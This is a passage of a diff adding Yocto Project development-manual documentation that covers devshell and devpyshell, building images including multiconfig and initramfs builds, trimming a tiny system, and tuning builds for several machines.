+directory. In the new terminal, all the OpenEmbedded build-related
+environment variables are still defined so you can use commands such as
+``configure`` and ``make``. The commands execute just as if the
+OpenEmbedded build system were executing them. Consequently, working
+this way can be helpful when debugging a build or preparing software to
+be used with the OpenEmbedded build system.
+
+Following is an example that uses ``devshell`` on a target named
+``matchbox-desktop``:
+::
+
+ $ bitbake matchbox-desktop -c devshell
+
+This command spawns a terminal with a shell prompt within the
+OpenEmbedded build environment. The
+:term:`OE_TERMINAL` variable
+controls what type of shell is opened.
+
+For spawned terminals, the following occurs:
+
+- The ``PATH`` variable includes the cross-toolchain.
+
+- The ``pkgconfig`` variables find the correct ``.pc`` files.
+
+- The ``configure`` command finds the Yocto Project site files as well
+ as any other necessary files.
+
+Within this environment, you can run configure or compile commands as if
+they were being run by the OpenEmbedded build system itself. As noted
+earlier, the working directory also automatically changes to the Source
+Directory (:term:`S`).
+
+To manually run a specific task using ``devshell``, run the
+corresponding ``run.*`` script in the
+``${``\ :term:`WORKDIR`\ ``}/temp``
+directory (e.g., ``run.do_configure.``\ `pid`). If a task's script does
+not exist, which would be the case if the task was skipped by way of the
+sstate cache, you can create the task by first running it outside of the
+``devshell``:
+::
+
+ $ bitbake -c task
+
+.. note::
+
+ - Execution of a task's ``run.*`` script and BitBake's execution of
+ a task are identical. In other words, running the script re-runs
+ the task just as it would be run using the ``bitbake -c`` command.
+
+ - Any ``run.*`` file that does not have a ``.pid`` extension is a
+ symbolic link (symlink) to the most recent version of that file.
+
+Remember, that the ``devshell`` is a mechanism that allows you to get
+into the BitBake task execution environment. And as such, all commands
+must be called just as BitBake would call them. That means you need to
+provide the appropriate options for cross-compilation and so forth as
+applicable.
+
+When you are finished using ``devshell``, exit the shell or close the
+terminal window.
+
+.. note::
+
+ - It is worth remembering that when using ``devshell`` you need to
+ use the full compiler name such as ``arm-poky-linux-gnueabi-gcc``
+ instead of just using ``gcc``. The same applies to other
+ applications such as ``binutils``, ``libtool`` and so forth.
+ BitBake sets up environment variables such as ``CC`` to assist
+ applications, such as ``make`` to find the correct tools.
+
+ - It is also worth noting that ``devshell`` still works over X11
+ forwarding and similar situations.
+
+.. _platdev-appdev-devpyshell:
+
+Using a Development Python Shell
+================================
+
+Similar to working within a development shell as described in the
+previous section, you can also spawn and work within an interactive
+Python development shell. When debugging certain commands or even when
+just editing packages, ``devpyshell`` can be a useful tool. When you
+invoke ``devpyshell``, all tasks up to and including
+:ref:`ref-tasks-patch` are run for the
+specified target. Then a new terminal is opened. Additionally, key
+Python objects and code are available in the same way they are to
+BitBake tasks, in particular, the data store 'd'. So, commands such as
+the following are useful when exploring the data store and running
+functions:
+::
+
+ pydevshell> d.getVar("STAGING_DIR")
+ '/media/build1/poky/build/tmp/sysroots'
+ pydevshell> d.getVar("STAGING_DIR")
+ '${TMPDIR}/sysroots'
+ pydevshell> d.setVar("FOO", "bar")
+ pydevshell> d.getVar("FOO")
+ 'bar'
+ pydevshell> d.delVar("FOO")
+ pydevshell> d.getVar("FOO")
+ pydevshell> bb.build.exec_func("do_unpack", d)
+ pydevshell>
+
+The commands execute just as if the OpenEmbedded build
+system were executing them. Consequently, working this way can be
+helpful when debugging a build or preparing software to be used with the
+OpenEmbedded build system.
+
+Following is an example that uses ``devpyshell`` on a target named
+``matchbox-desktop``:
+::
+
+ $ bitbake matchbox-desktop -c devpyshell
+
+This command spawns a terminal and places you in an interactive Python
+interpreter within the OpenEmbedded build environment. The
+:term:`OE_TERMINAL` variable
+controls what type of shell is opened.
+
+When you are finished using ``devpyshell``, you can exit the shell
+either by using Ctrl+d or closing the terminal window.
+
+.. _dev-building:
+
+Building
+========
+
+This section describes various build procedures. For example, the steps
+needed for a simple build, a target that uses multiple configurations,
+building an image for more than one machine, and so forth.
+
+.. _dev-building-a-simple-image:
+
+Building a Simple Image
+-----------------------
+
+In the development environment, you need to build an image whenever you
+change hardware support, add or change system libraries, or add or
+change services that have dependencies. Several methods exist that allow
+you to build an image within the Yocto Project. This section presents
+the basic steps you need to build a simple image using BitBake from a
+build host running Linux.
+
+.. note::
+
+ - For information on how to build an image using
+ :term:`Toaster`, see the
+ :doc:`../toaster-manual/toaster-manual`.
+
+ - For information on how to use ``devtool`` to build images, see the
+ ":ref:`sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+ - For a quick example on how to build an image using the
+ OpenEmbedded build system, see the
+ :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+
+The build process creates an entire Linux distribution from source and
+places it in your :term:`Build Directory` under
+``tmp/deploy/images``. For detailed information on the build process
+using BitBake, see the ":ref:`images-dev-environment`" section in the
+Yocto Project Overview and Concepts Manual.
+
+The following figure and list overviews the build process:
+
+.. image:: figures/bitbake-build-flow.png
+ :align: center
+
+1. *Set up Your Host Development System to Support Development Using the
+ Yocto Project*: See the ":doc:`dev-manual-start`" section for options on how to get a
+ build host ready to use the Yocto Project.
+
+2. *Initialize the Build Environment:* Initialize the build environment
+ by sourcing the build environment script (i.e.
+ :ref:`structure-core-script`):
+ ::
+
+ $ source oe-init-build-env [build_dir]
+
+ When you use the initialization script, the OpenEmbedded build system
+ uses ``build`` as the default :term:`Build Directory` in your current work
+ directory. You can use a `build_dir` argument with the script to
+ specify a different build directory.
+
+ .. note::
+
+ A common practice is to use a different Build Directory for
+ different targets. For example, ``~/build/x86`` for a ``qemux86``
+ target, and ``~/build/arm`` for a ``qemuarm`` target.
+
+3. *Make Sure Your* ``local.conf`` *File is Correct*: Ensure the
+ ``conf/local.conf`` configuration file, which is found in the Build
+ Directory, is set up how you want it. This file defines many aspects
+ of the build environment including the target machine architecture
+ through the ``MACHINE`` variable, the packaging format used during
+ the build
+ (:term:`PACKAGE_CLASSES`),
+ and a centralized tarball download directory through the
+ :term:`DL_DIR` variable.
+
+4. *Build the Image:* Build the image using the ``bitbake`` command:
+ ::
+
+ $ bitbake target
+
+ .. note::
+
+ For information on BitBake, see the :doc:`bitbake:index`.
+
+ The target is the name of the recipe you want to build. Common
+ targets are the images in ``meta/recipes-core/images``,
+ ``meta/recipes-sato/images``, and so forth all found in the
+ :term:`Source Directory`. Or, the target
+ can be the name of a recipe for a specific piece of software such as
+ BusyBox. For more details about the images the OpenEmbedded build
+ system supports, see the
+ ":ref:`ref-manual/ref-images:Images`" chapter in the Yocto
+ Project Reference Manual.
+
+ As an example, the following command builds the
+ ``core-image-minimal`` image:
+ ::
+
+ $ bitbake core-image-minimal
+
+ Once an
+ image has been built, it often needs to be installed. The images and
+ kernels built by the OpenEmbedded build system are placed in the
+ Build Directory in ``tmp/deploy/images``. For information on how to
+ run pre-built images such as ``qemux86`` and ``qemuarm``, see the
+ :doc:`../sdk-manual/sdk-manual` manual. For
+ information about how to install these images, see the documentation
+ for your particular board or machine.
+
+.. _dev-building-images-for-multiple-targets-using-multiple-configurations:
+
+Building Images for Multiple Targets Using Multiple Configurations
+------------------------------------------------------------------
+
+You can use a single ``bitbake`` command to build multiple images or
+packages for different targets where each image or package requires a
+different configuration (multiple configuration builds). The builds, in
+this scenario, are sometimes referred to as "multiconfigs", and this
+section uses that term throughout.
+
+This section describes how to set up for multiple configuration builds
+and how to account for cross-build dependencies between the
+multiconfigs.
+
+.. _dev-setting-up-and-running-a-multiple-configuration-build:
+
+Setting Up and Running a Multiple Configuration Build
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To accomplish a multiple configuration build, you must define each
+target's configuration separately using a parallel configuration file in
+the :term:`Build Directory` or configuration directory within a layer, and you
+must follow a required file hierarchy. Additionally, you must enable the
+multiple configuration builds in your ``local.conf`` file.
+
+Follow these steps to set up and execute multiple configuration builds:
+
+- *Create Separate Configuration Files*: You need to create a single
+ configuration file for each build target (each multiconfig).
+ The configuration definitions are implementation dependent but often
+ each configuration file will define the machine and the
+ temporary directory BitBake uses for the build. Whether the same
+ temporary directory (:term:`TMPDIR`) can be shared will depend on what is
+ similar and what is different between the configurations. Multiple MACHINE
+ targets can share the same (:term:`TMPDIR`) as long as the rest of the
+ configuration is the same, multiple DISTRO settings would need separate
+ (:term:`TMPDIR`) directories.
+
+ For example, consider a scenario with two different multiconfigs for the same
+ :term:`MACHINE`: "qemux86" built
+ for two distributions such as "poky" and "poky-lsb". In this case,
+ you would need to use the different :term:`TMPDIR`.
+
+ Here is an example showing the minimal statements needed in a
+ configuration file for a "qemux86" target whose temporary build
+ directory is ``tmpmultix86``::
+
+ MACHINE = "qemux86"
+ TMPDIR = "${TOPDIR}/tmpmultix86"
+
+ The location for these multiconfig configuration files is specific.
+ They must reside in the current :term:`Build Directory` in a sub-directory of
+ ``conf`` named ``multiconfig`` or within a layer's ``conf`` directory
+ under a directory named ``multiconfig``. Following is an example that defines
+ two configuration files for the "x86" and "arm" multiconfigs:
+
+ .. image:: figures/multiconfig_files.png
+ :align: center
+ :width: 50%
+
+ The usual :term:`BBPATH` search path is used to locate multiconfig files in
+ a similar way to other conf files.
+
+- *Add the BitBake Multi-configuration Variable to the Local
+ Configuration File*: Use the
+ :term:`BBMULTICONFIG`
+ variable in your ``conf/local.conf`` configuration file to specify
+ each multiconfig. Continuing with the example from the previous
+ figure, the :term:`BBMULTICONFIG` variable needs to enable two
+ multiconfigs: "x86" and "arm" by specifying each configuration file::
+
+ BBMULTICONFIG = "x86 arm"
+
+ .. note::
+
+ A "default" configuration already exists by definition. This
+ configuration is named: "" (i.e. empty string) and is defined by
+ the variables coming from your ``local.conf``
+ file. Consequently, the previous example actually adds two
+ additional configurations to your build: "arm" and "x86" along
+ with "".
+
+- *Launch BitBake*: Use the following BitBake command form to launch
+ the multiple configuration build::
+
+ $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ]
+
+ For the example in this section, the following command applies::
+
+ $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base
+
+ The previous BitBake command builds a ``core-image-minimal`` image
+ that is configured through the ``x86.conf`` configuration file, a
+ ``core-image-sato`` image that is configured through the ``arm.conf``
+ configuration file and a ``core-image-base`` that is configured
+ through your ``local.conf`` configuration file.
+
+.. note::
+
+ Support for multiple configuration builds in the Yocto Project &DISTRO;
+ (&DISTRO_NAME;) Release does not include Shared State (sstate)
+ optimizations. Consequently, if a build uses the same object twice
+ in, for example, two different :term:`TMPDIR`
+ directories, the build either loads from an existing sstate cache for
+ that build at the start or builds the object fresh.
+
+.. _dev-enabling-multiple-configuration-build-dependencies:
+
+Enabling Multiple Configuration Build Dependencies
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Sometimes dependencies can exist between targets (multiconfigs) in a
+multiple configuration build. For example, suppose that in order to
+build a ``core-image-sato`` image for an "x86" multiconfig, the root
+filesystem of an "arm" multiconfig must exist. This dependency is
+essentially that the
+:ref:`ref-tasks-image` task in the
+``core-image-sato`` recipe depends on the completion of the
+:ref:`ref-tasks-rootfs` task of the
+``core-image-minimal`` recipe.
+
+To enable dependencies in a multiple configuration build, you must
+declare the dependencies in the recipe using the following statement
+form::
+
+ task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend"
+
+To better show how to use this statement, consider the example scenario
+from the first paragraph of this section. The following statement needs
+to be added to the recipe that builds the ``core-image-sato`` image::
+
+ do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs"
+
+In this example, the `from_multiconfig` is "x86". The `to_multiconfig` is "arm". The
+task on which the :ref:`ref-tasks-image` task in the recipe depends is the
+:ref:`ref-tasks-rootfs` task from the ``core-image-minimal`` recipe associated
+with the "arm" multiconfig.
+
+Once you set up this dependency, you can build the "x86" multiconfig
+using a BitBake command as follows::
+
+ $ bitbake mc:x86:core-image-sato
+
+This command executes all the tasks needed to create the
+``core-image-sato`` image for the "x86" multiconfig. Because of the
+dependency, BitBake also executes through the :ref:`ref-tasks-rootfs` task for the
+"arm" multiconfig build.
+
+Having a recipe depend on the root filesystem of another build might not
+seem that useful. Consider this change to the statement in the
+``core-image-sato`` recipe::
+
+ do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image"
+
+In this case, BitBake must
+create the ``core-image-minimal`` image for the "arm" build since the
+"x86" build depends on it.
+
+Because "x86" and "arm" are enabled for multiple configuration builds
+and have separate configuration files, BitBake places the artifacts for
+each build in the respective temporary build directories (i.e.
+:term:`TMPDIR`).
+
+.. _building-an-initramfs-image:
+
+Building an Initial RAM Filesystem (initramfs) Image
+----------------------------------------------------
+
+An initial RAM filesystem (initramfs) image provides a temporary root
+filesystem used for early system initialization (e.g. loading of modules
+needed to locate and mount the "real" root filesystem).
+
+.. note::
+
+ The initramfs image is the successor of initial RAM disk (initrd). It
+ is a "copy in and out" (cpio) archive of the initial filesystem that
+ gets loaded into memory during the Linux startup process. Because
+ Linux uses the contents of the archive during initialization, the
+ initramfs image needs to contain all of the device drivers and tools
+ needed to mount the final root filesystem.
+
+Follow these steps to create an initramfs image:
+
+1. *Create the initramfs Image Recipe:* You can reference the
+ ``core-image-minimal-initramfs.bb`` recipe found in the
+ ``meta/recipes-core`` directory of the :term:`Source Directory`
+ as an example
+ from which to work.
+
+2. *Decide if You Need to Bundle the initramfs Image Into the Kernel
+ Image:* If you want the initramfs image that is built to be bundled
+ in with the kernel image, set the
+ :term:`INITRAMFS_IMAGE_BUNDLE`
+ variable to "1" in your ``local.conf`` configuration file and set the
+ :term:`INITRAMFS_IMAGE`
+ variable in the recipe that builds the kernel image.
+
+ .. note::
+
+ It is recommended that you do bundle the initramfs image with the
+ kernel image to avoid circular dependencies between the kernel
+ recipe and the initramfs recipe should the initramfs image include
+ kernel modules.
+
+ Setting the ``INITRAMFS_IMAGE_BUNDLE`` flag causes the initramfs
+ image to be unpacked into the ``${B}/usr/`` directory. The unpacked
+ initramfs image is then passed to the kernel's ``Makefile`` using the
+ :term:`CONFIG_INITRAMFS_SOURCE`
+ variable, allowing the initramfs image to be built into the kernel
+ normally.
+
+ .. note::
+
+ If you choose to not bundle the initramfs image with the kernel
+ image, you are essentially using an
+ `Initial RAM Disk (initrd) <https://en.wikipedia.org/wiki/Initrd>`__.
+ Creating an initrd is handled primarily through the :term:`INITRD_IMAGE`,
+ ``INITRD_LIVE``, and ``INITRD_IMAGE_LIVE`` variables. For more
+ information, see the :ref:`ref-classes-image-live` file.
+
+3. *Optionally Add Items to the initramfs Image Through the initramfs
+ Image Recipe:* If you add items to the initramfs image by way of its
+ recipe, you should use
+ :term:`PACKAGE_INSTALL`
+ rather than
+ :term:`IMAGE_INSTALL`.
+ ``PACKAGE_INSTALL`` gives more direct control of what is added to the
+ image as compared to the defaults you might not necessarily want that
+ are set by the :ref:`image <ref-classes-image>`
+ or :ref:`core-image <ref-classes-core-image>`
+ classes.
+
+4. *Build the Kernel Image and the initramfs Image:* Build your kernel
+ image using BitBake. Because the initramfs image recipe is a
+ dependency of the kernel image, the initramfs image is built as well
+ and bundled with the kernel image if you used the
+ :term:`INITRAMFS_IMAGE_BUNDLE`
+ variable described earlier.
+
+Building a Tiny System
+----------------------
+
+Very small distributions have some significant advantages such as
+requiring less on-die or in-package memory (cheaper), better performance
+through efficient cache usage, lower power requirements due to less
+memory, faster boot times, and reduced development overhead. Some
+real-world examples where a very small distribution gives you distinct
+advantages are digital cameras, medical devices, and small headless
+systems.
+
+This section presents information that shows you how you can trim your
+distribution to even smaller sizes than the ``poky-tiny`` distribution,
+which is around 5 Mbytes, that can be built out-of-the-box using the
+Yocto Project.
+
+.. _tiny-system-overview:
+
+Tiny System Overview
+~~~~~~~~~~~~~~~~~~~~
+
+The following list presents the overall steps you need to consider and
+perform to create distributions with smaller root filesystems, achieve
+faster boot times, maintain your critical functionality, and avoid
+initial RAM disks:
+
+- `Determine your goals and guiding
+ principles. <#goals-and-guiding-principles>`__
+
+- `Understand what contributes to your image
+ size. <#understand-what-gives-your-image-size>`__
+
+- `Reduce the size of the root
+ filesystem. <#trim-the-root-filesystem>`__
+
+- `Reduce the size of the kernel. <#trim-the-kernel>`__
+
+- `Eliminate packaging
+ requirements. <#remove-package-management-requirements>`__
+
+- `Look for other ways to minimize
+ size. <#look-for-other-ways-to-minimize-size>`__
+
+- `Iterate on the process. <#iterate-on-the-process>`__
+
+Goals and Guiding Principles
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Before you can reach your destination, you need to know where you are
+going. Here is an example list that you can use as a guide when creating
+very small distributions:
+
+- Determine how much space you need (e.g. a kernel that is 1 Mbyte or
+ less and a root filesystem that is 3 Mbytes or less).
+
+- Find the areas that are currently taking 90% of the space and
+ concentrate on reducing those areas.
+
+- Do not create any difficult "hacks" to achieve your goals.
+
+- Leverage the device-specific options.
+
+- Work in a separate layer so that you keep changes isolated. For
+ information on how to create layers, see the "`Understanding and
+ Creating Layers <#understanding-and-creating-layers>`__" section.
+
+.. _understand-what-gives-your-image-size:
+
+Understand What Contributes to Your Image Size
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+It is easiest to have something to start with when creating your own
+distribution. You can use the Yocto Project out-of-the-box to create the
+``poky-tiny`` distribution. Ultimately, you will want to make changes in
+your own distribution that are likely modeled after ``poky-tiny``.
+
+.. note::
+
+ To use ``poky-tiny`` in your build, set the ``DISTRO`` variable in your
+ ``local.conf`` file to "poky-tiny" as described in the
+ ":ref:`dev-manual/dev-manual-common-tasks:creating your own distribution`"
+ section.
+
+Understanding some memory concepts will help you reduce the system size.
+Memory consists of static, dynamic, and temporary memory. Static memory
+is the TEXT (code), DATA (initialized data in the code), and BSS
+(uninitialized data) sections. Dynamic memory represents memory that is
+allocated at runtime: stacks, hash tables, and so forth. Temporary
+memory is recovered after the boot process. This memory consists of
+memory used for decompressing the kernel and for the ``__init__``
+functions.
+
+To help you see where you currently are with kernel and root filesystem
+sizes, you can use two tools found in the :term:`Source Directory`
+in the
+``scripts/tiny/`` directory:
+
+- ``ksize.py``: Reports component sizes for the kernel build objects.
+
+- ``dirsize.py``: Reports component sizes for the root filesystem.
+
+This next tool and command help you organize configuration fragments and
+view file dependencies in a human-readable form:
+
+- ``merge_config.sh``: Helps you manage configuration files and
+ fragments within the kernel. With this tool, you can merge individual
+ configuration fragments together. The tool allows you to make
+ overrides and warns you of any missing configuration options. The
+ tool is ideal for allowing you to iterate on configurations, create
+ minimal configurations, and create configuration files for different
+ machines without having to duplicate your process.
+
+ The ``merge_config.sh`` script is part of the Linux Yocto kernel Git
+ repositories (i.e. ``linux-yocto-3.14``, ``linux-yocto-3.10``,
+ ``linux-yocto-3.8``, and so forth) in the ``scripts/kconfig``
+ directory.
+
+ For more information on configuration fragments, see the
+ ":ref:`creating-config-fragments`"
+ section in the Yocto Project Linux Kernel Development Manual.
+
+- ``bitbake -u taskexp -g bitbake_target``: Using the BitBake command
+ with these options brings up a Dependency Explorer from which you can
+ view file dependencies. Understanding these dependencies allows you
+ to make informed decisions when cutting out various pieces of the
+ kernel and root filesystem.
+
+Trim the Root Filesystem
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The root filesystem is made up of packages for booting, libraries, and
+applications. To change things, you can configure how the packaging
+happens, which changes the way you build them. You can also modify the
+filesystem itself or select a different filesystem.
+
+First, find out what is hogging your root filesystem by running the
+``dirsize.py`` script from your root directory:
+::
+
+ $ cd root-directory-of-image
+ $ dirsize.py 100000 > dirsize-100k.log
+ $ cat dirsize-100k.log
+
+You can apply a filter to the script to ignore files
+under a certain size. The previous example filters out any files below
+100 Kbytes. The sizes reported by the tool are uncompressed, and thus
+will be smaller by a relatively constant factor in a compressed root
+filesystem. When you examine your log file, you can focus on areas of
+the root filesystem that take up large amounts of memory.
+
+You need to be sure that what you eliminate does not cripple the
+functionality you need. One way to see how packages relate to each other
+is by using the Dependency Explorer UI with the BitBake command:
+::
+
+ $ cd image-directory
+ $ bitbake -u taskexp -g image
+
+Use the interface to
+select potential packages you wish to eliminate and see their dependency
+relationships.
+
+When deciding how to reduce the size, get rid of packages that result in
+minimal impact on the feature set. For example, you might not need a VGA
+display. Or, you might be able to get by with ``devtmpfs`` and ``mdev``
+instead of ``udev``.
+
+Use your ``local.conf`` file to make changes. For example, to eliminate
+``udev`` and ``glib``, set the following in the local configuration
+file:
+::
+
+ VIRTUAL-RUNTIME_dev_manager = ""
+
+Finally, you should consider exactly the type of root filesystem you
+need to meet your needs while also reducing its size. For example,
+consider ``cramfs``, ``squashfs``, ``ubifs``, ``ext2``, or an
+``initramfs`` using ``initramfs``. Be aware that ``ext3`` requires a 1
+Mbyte journal. If you are okay with running read-only, you do not need
+this journal.
+
+.. note::
+
+ After each round of elimination, you need to rebuild your system and
+ then use the tools to see the effects of your reductions.
+
+Trim the Kernel
+~~~~~~~~~~~~~~~
+
+The kernel is built by including policies for hardware-independent
+aspects. What subsystems do you enable? For what architecture are you
+building? Which drivers do you build by default?
+
+.. note::
+
+ You can modify the kernel source if you want to help with boot time.
+
+Run the ``ksize.py`` script from the top-level Linux build directory to
+get an idea of what is making up the kernel:
+::
+
+ $ cd top-level-linux-build-directory
+ $ ksize.py > ksize.log
+ $ cat ksize.log
+
+When you examine the log, you will see how much space is taken up with
+the built-in ``.o`` files for drivers, networking, core kernel files,
+filesystem, sound, and so forth. The sizes reported by the tool are
+uncompressed, and thus will be smaller by a relatively constant factor
+in a compressed kernel image. Look to reduce the areas that are large
+and taking up around the "90% rule."
+
+To examine, or drill down, into any particular area, use the ``-d``
+option with the script:
+::
+
+ $ ksize.py -d > ksize.log
+
+Using this option
+breaks out the individual file information for each area of the kernel
+(e.g. drivers, networking, and so forth).
+
+Use your log file to see what you can eliminate from the kernel based on
+features you can let go. For example, if you are not going to need
+sound, you do not need any drivers that support sound.
+
+After figuring out what to eliminate, you need to reconfigure the kernel
+to reflect those changes during the next build. You could run
+``menuconfig`` and make all your changes at once. However, that makes it
+difficult to see the effects of your individual eliminations and also
+makes it difficult to replicate the changes for perhaps another target
+device. A better method is to start with no configurations using
+``allnoconfig``, create configuration fragments for individual changes,
+and then manage the fragments into a single configuration file using
+``merge_config.sh``. The tool makes it easy for you to iterate using the
+configuration change and build cycle.
+
+Each time you make configuration changes, you need to rebuild the kernel
+and check to see what impact your changes had on the overall size.
+
+Remove Package Management Requirements
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Packaging requirements add size to the image. One way to reduce the size
+of the image is to remove all the packaging requirements from the image.
+This reduction includes both removing the package manager and its unique
+dependencies as well as removing the package management data itself.
+
+To eliminate all the packaging requirements for an image, be sure that
+"package-management" is not part of your
+:term:`IMAGE_FEATURES`
+statement for the image. When you remove this feature, you are removing
+the package manager as well as its dependencies from the root
+filesystem.
+
+Look for Other Ways to Minimize Size
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Depending on your particular circumstances, other areas that you can
+trim likely exist. The key to finding these areas is through tools and
+methods described here combined with experimentation and iteration. Here
+are a couple of areas to experiment with:
+
+- ``glibc``: In general, follow this process:
+
+ 1. Remove ``glibc`` features from
+ :term:`DISTRO_FEATURES`
+ that you think you do not need.
+
+ 2. Build your distribution.
+
+ 3. If the build fails due to missing symbols in a package, determine
+ if you can reconfigure the package to not need those features. For
+ example, change the configuration to not support wide character
+ support as is done for ``ncurses``. Or, if support for those
+ characters is needed, determine what ``glibc`` features provide
+ the support and restore the configuration.
+
+ 4. Rebuild and repeat the process.
+
+- ``busybox``: For BusyBox, use a process similar as described for
+ ``glibc``. A difference is you will need to boot the resulting system
+ to see if you are able to do everything you expect from the running
+ system. You need to be sure to integrate configuration fragments into
+ Busybox because BusyBox handles its own core features and then allows
+ you to add configuration fragments on top.
+
+Iterate on the Process
+~~~~~~~~~~~~~~~~~~~~~~
+
+If you have not reached your goals on system size, you need to iterate
+on the process. The process is the same. Use the tools and see just what
+is taking up 90% of the root filesystem and the kernel. Decide what you
+can eliminate without limiting your device beyond what you need.
+
+Depending on your system, a good place to look might be Busybox, which
+provides a stripped down version of Unix tools in a single, executable
+file. You might be able to drop virtual terminal services or perhaps
+ipv6.
+
+Building Images for More than One Machine
+-----------------------------------------
+
+A common scenario developers face is creating images for several
+different machines that use the same software environment. In this
+situation, it is tempting to set the tunings and optimization flags for
+each build specifically for the targeted hardware (i.e. "maxing out" the
+tunings). Doing so can considerably add to build times and package feed
+maintenance collectively for the machines. For example, selecting tunes
+that are extremely specific to a CPU core used in a system might enable
+some micro optimizations in GCC for that particular system but would
+otherwise not gain you much of a performance difference across the other
+systems as compared to using a more general tuning across all the builds
+(e.g. setting :term:`DEFAULTTUNE`
+specifically for each machine's build). Rather than "max out" each
+build's tunings, you can take steps that cause the OpenEmbedded build
+system to reuse software across the various machines where it makes
+sense.
+
+If build speed and package feed maintenance are considerations, you
+should consider the points in this section that can help you optimize
+your tunings to best consider build times and package feed maintenance.
+
+- *Share the Build Directory:* If at all possible, share the
+ :term:`TMPDIR` across builds. The
+ Yocto Project supports switching between different
+ :term:`MACHINE` values in the same
+ ``TMPDIR``. This practice is well supported and regularly used by
+ developers when building for multiple machines. When you use the same
+ ``TMPDIR`` for multiple machine builds, the OpenEmbedded build system
+ can reuse the existing native and often cross-recipes for multiple
+ machines. Thus, build time decreases.
+
+ .. note::
+
+ If :term:`DISTRO` settings change or fundamental configuration settings
+ such as the filesystem layout, you need to work with a clean ``TMPDIR``.
+ Sharing ``TMPDIR`` under these circumstances might work but since it is
+ not guaranteed, you should use a clean ``TMPDIR``.
+
+- *Enable the Appropriate Package Architecture:* By default, the
+ OpenEmbedded build system enables three levels of package
+ architectures: "all", "tune" or "package", and "machine". Any given
+ recipe usually selects one of these package architectures (types) for
+ its output. Depending for what a given recipe creates packages,
+ making sure you enable the appropriate package architecture can
+ directly impact the build time.
+
+ A recipe that just generates scripts can enable "all" architecture
+ because there are no binaries to build. To specifically enable "all"
+ architecture, be sure your recipe inherits the
+ :ref:`allarch <ref-classes-allarch>` class.
+ This class is useful for "all" architectures because it configures
+ many variables so packages can be used across multiple architectures.
+
+ If your recipe needs to generate packages that are machine-specific
+ or when one of the build or runtime dependencies is already
+ machine-architecture dependent, which makes your recipe also
+ machine-architecture dependent, make sure your recipe enables the
+ "machine" package architecture through the
+ :term:`MACHINE_ARCH`
+ variable:
+ ::
+
+ PACKAGE_ARCH = "${MACHINE_ARCH}"
+
+ When you do not
+ specifically enable a package architecture through the
+ :term:`PACKAGE_ARCH`, The
+ OpenEmbedded build system defaults to the
+ :term:`TUNE_PKGARCH` setting:
+ ::
+
+ PACKAGE_ARCH = "${TUNE_PKGARCH}"
+
+- *Choose a Generic Tuning File if Possible:* Some tunes are more
+ generic and can run on multiple targets (e.g. an ``armv5`` set of
+ packages could run on ``armv6`` and ``armv7`` processors in most
+ cases). Similarly, ``i486`` binaries could work on ``i586`` and
+ higher processors. You should realize, however, that advances on
+ newer processor versions would not be used.
+
+ If you select the same tune for several different machines, the
+ OpenEmbedded build system reuses software previously built, thus
+ speeding up the overall build time. Realize that even though a new
+ sysroot for each machine is generated, the software is not recompiled
+ and only one package feed exists.
+
+- *Manage Granular Level Packaging:* Sometimes cases exist where
+ injecting another level of package architecture beyond the three
+ higher levels noted earlier can be useful. For example, consider how
+ NXP (formerly Freescale) allows for the easy reuse of binary packages
+ in their layer
+ :yocto_git:`meta-freescale </cgit/cgit.cgi/meta-freescale/>`.
+ In this example, the
+ :yocto_git:`fsl-dynamic-packagearch </cgit/cgit.cgi/meta-freescale/tree/classes/fsl-dynamic-packagearch.bbclass>`
+ class shares GPU packages for i.MX53 boards because all boards share
+ the AMD GPU. The i.MX6-based boards can do the same because all
+ boards share the Vivante GPU. This class inspects the BitBake
+ datastore to identify if the package provides or depends on one of
+ the sub-architecture values. If so, the class sets the
+ :term:`PACKAGE_ARCH` value
+ based on the ``MACHINE_SUBARCH`` value. If the package does not
+ provide or depend on one of the sub-architecture values but it
+ matches a value in the machine-specific filter, it sets
+ :term:`MACHINE_ARCH`. This
+ behavior reduces the number of packages built and saves build time by
+ reusing binaries.
+
+- *Use Tools to Debug Issues:* Sometimes you can run into situations
+ where software is being rebuilt when you think it should not be. For
+ example, the OpenEmbedded build system might not be using shared
+ state between machines when you think it should be. These types of
+ situations are usually due to references to machine-specific
+ variables such as :term:`MACHINE`,
+ :term:`SERIAL_CONSOLES`,
+ :term:`XSERVER`,
+ :term:`MACHINE_FEATURES`,
+ and so forth in code that is supposed to only be tune-specific or
+ when the recipe depends
+ (:term:`DEPENDS`,
+ :term:`RDEPENDS`,
+ :term:`RRECOMMENDS`,
+ :term:`RSUGGESTS`, and so forth)
+ on some other recipe that already has
+ :term:`PACKAGE_ARCH` defined
+ as "${MACHINE_ARCH}".
+
+ .. note::
+
+ Patches to fix any issues identified are most welcome as these
+ issues occasionally do occur.
+
+ For such cases, you can use some tools to help you sort out the
+ situation:
+
+ - ``state-diff-machines.sh``*:* You can find this tool in the
+ ``scripts`` directory of the Source Repositories. See the comments
+ in the script for information on how to use the tool.
+
+ - *BitBake's "-S printdiff" Option:* Using this option causes
+ BitBake to try to establish the closest signature match it can
+ (e.g. in the shared state cache) and then run ``bitbake-diffsigs``
+ over the matches to determine the stamps and delta where these two
+ stamp trees diverge.
+
+Building Software from an External Source
+-----------------------------------------
+
+By default, the OpenEmbedded build system uses the
+:term:`Build Directory` when building source
+code. The build process involves fetching the source files, unpacking
+them, and then patching them if necessary before the build takes place.
+
+Situations exist where you might want to build software from source
+files that are external to and thus outside of the OpenEmbedded build
+system. For example, suppose you have a project that includes a new BSP
+with a heavily customized kernel. And, you want to minimize exposing the
+build system to the development team so that they can focus on their
